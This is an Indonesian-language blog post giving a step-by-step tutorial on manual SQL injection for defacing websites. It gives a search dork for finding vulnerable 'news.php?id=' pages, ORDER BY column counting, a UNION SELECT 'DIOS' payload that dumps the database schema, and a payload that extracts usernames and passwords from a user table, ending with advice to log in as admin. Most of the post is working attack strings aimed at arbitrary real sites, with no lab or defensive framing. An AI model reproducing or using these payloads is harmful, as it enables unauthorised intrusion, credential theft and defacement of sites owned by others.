Deface dengan SQL Manual

    
20181025-153526
Hai Guys :)
 Ketemu lagi dengan Saya :) ^_^
kali ini kita akan membahas tentang Tutorial Cara SQL Manual / SQLI istilahnya ya :v

Oke pertama kita dork dulu ya :)
Dorknya:
inrul:/news.php?id= site:com .net .id

kembangi lagi biar dapat prawan :v

Sekarang kita two the poin aja
target saya uda ada :)

Nah ini Target saya :)
Pertama kamu harus tambahkan sesuatu seperti (')

kan Web nya Blank berarti Vuln
sekarang kamu cari ordernya
contoh : 
+order+by+1--+ ( no blank )

+order+by+2--+ (no blank )
+order+by+7--+ (no blank)
+order+by+9--+ (blank)
cari dia sampai Blank 
kan Blank dia No 8
 nah kalian skrng https://site.com/berita.php?id=100'+union+select+1,2,3,4,5,6,7--+
untuk mecari angka togel :v
alian data bases nya

Ketemu kan Angka togelnya yang No. 2
sekarang kita Masukan Dios nya
https://site.com/berita.php?id=100'+union+select+1,Concat(0x3c43656e7465723e,0x496e6a656374696f6e204279204d72765f323331,0x3c62723e,0x3c62723e,Version(),0x3c62723e,Database(),0x3c62723e,User(),@C:=0x3c62723e,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,0x3a,0x3a,0x3a,Column_Name)),0x3a,0x00),@C)
,3,4,5,6,7--+
kan ada no .2 itu kita ganti no.2 itu dengan Dios nya :)

nah kayak gini contoh nya tadi :)
sekarang kita akan mencari UserName dan Paswoard

yang Dios itu yang tadi ganti sama
https://site.com/berita.php?id=100'+union+select+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(h14471_13102016
.user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x7e,password,0x3c62723e))))x)0
,3,4,5,6,7--+

nah ketemu kan username nya sama paswoard nya
kalau menemukan admin login pakai Otak kalian

Sekian Dari saya :)

Comments

Popular Posts